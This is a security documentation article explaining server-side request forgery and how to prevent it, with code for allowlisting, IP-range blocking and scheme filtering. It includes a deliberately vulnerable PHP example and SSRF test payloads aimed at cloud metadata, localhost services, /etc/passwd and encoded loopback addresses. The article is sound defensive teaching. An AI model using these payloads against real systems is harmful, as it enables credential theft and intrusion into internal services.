Docs / Security / Understanding and Preventing Server-Side Request Forgery (SSRF)

Understanding and Preventing Server-Side Request Forgery (SSRF)

By Admin · Mar 15, 2026 · Updated Apr 23, 2026 · 252 views · 2 min read

Server-Side Request Forgery (SSRF) is a vulnerability where an attacker can make your server send HTTP requests to arbitrary destinations, potentially accessing internal services, cloud metadata APIs, or other protected resources.

How SSRF Works

# Vulnerable code example (PHP):
# $url = $_GET["url"];
# $content = file_get_contents($url);
# echo $content;

# An attacker could request:
# ?url=http://169.254.169.254/latest/meta-data/  (cloud metadata)
# ?url=http://127.0.0.1:3306/  (internal MySQL)
# ?url=http://internal-admin-panel.local/  (internal services)
# ?url=file:///etc/passwd  (local files)

Common SSRF Targets

  • Cloud metadata APIs — 169.254.169.254 (AWS, GCP, Azure credentials)
  • Internal services — Redis, MySQL, Elasticsearch on localhost
  • Internal networks — Other servers on the same network
  • Local files — Using file:// protocol

Prevention Strategies

1. Input Validation

# Validate and sanitize URLs before making requests
# Whitelist allowed domains/IPs
$allowed_domains = ["api.example.com", "cdn.example.com"];
$parsed = parse_url($url);
if (!in_array($parsed["host"], $allowed_domains)) {
    die("Domain not allowed");
}

2. Block Internal Addresses

# Deny requests to internal/private IP ranges
# 127.0.0.0/8 (loopback)
# 10.0.0.0/8 (private)
# 172.16.0.0/12 (private)
# 192.168.0.0/16 (private)
# 169.254.0.0/16 (link-local / cloud metadata)
# fc00::/7 (IPv6 private)

# Using iptables to block outbound to metadata
sudo iptables -A OUTPUT -d 169.254.169.254 -j DROP

3. Use a Proxy for Outbound Requests

# Route all application HTTP requests through a forward proxy
# The proxy can enforce URL filtering and logging
# Tools: Squid, tinyproxy

4. Disable Unnecessary URL Schemes

# Only allow http:// and https://
# Block: file://, gopher://, dict://, ftp://
if (!preg_match("/^https?:\/\//i", $url)) {
    die("Only HTTP(S) URLs allowed");
}

Testing for SSRF

# Test if your application is vulnerable:
# Try requesting internal addresses through any URL input:
# http://127.0.0.1
# http://localhost
# http://[::1]
# http://0.0.0.0
# http://169.254.169.254
# http://0x7f000001 (hex encoding of 127.0.0.1)
# http://2130706433 (decimal encoding of 127.0.0.1)

WAF Rules for SSRF

# Nginx: Block common SSRF patterns in upstream requests
# ModSecurity rules can detect SSRF attempts
# Cloudflare WAF includes SSRF protection rules

Was this article helpful?

Related Articles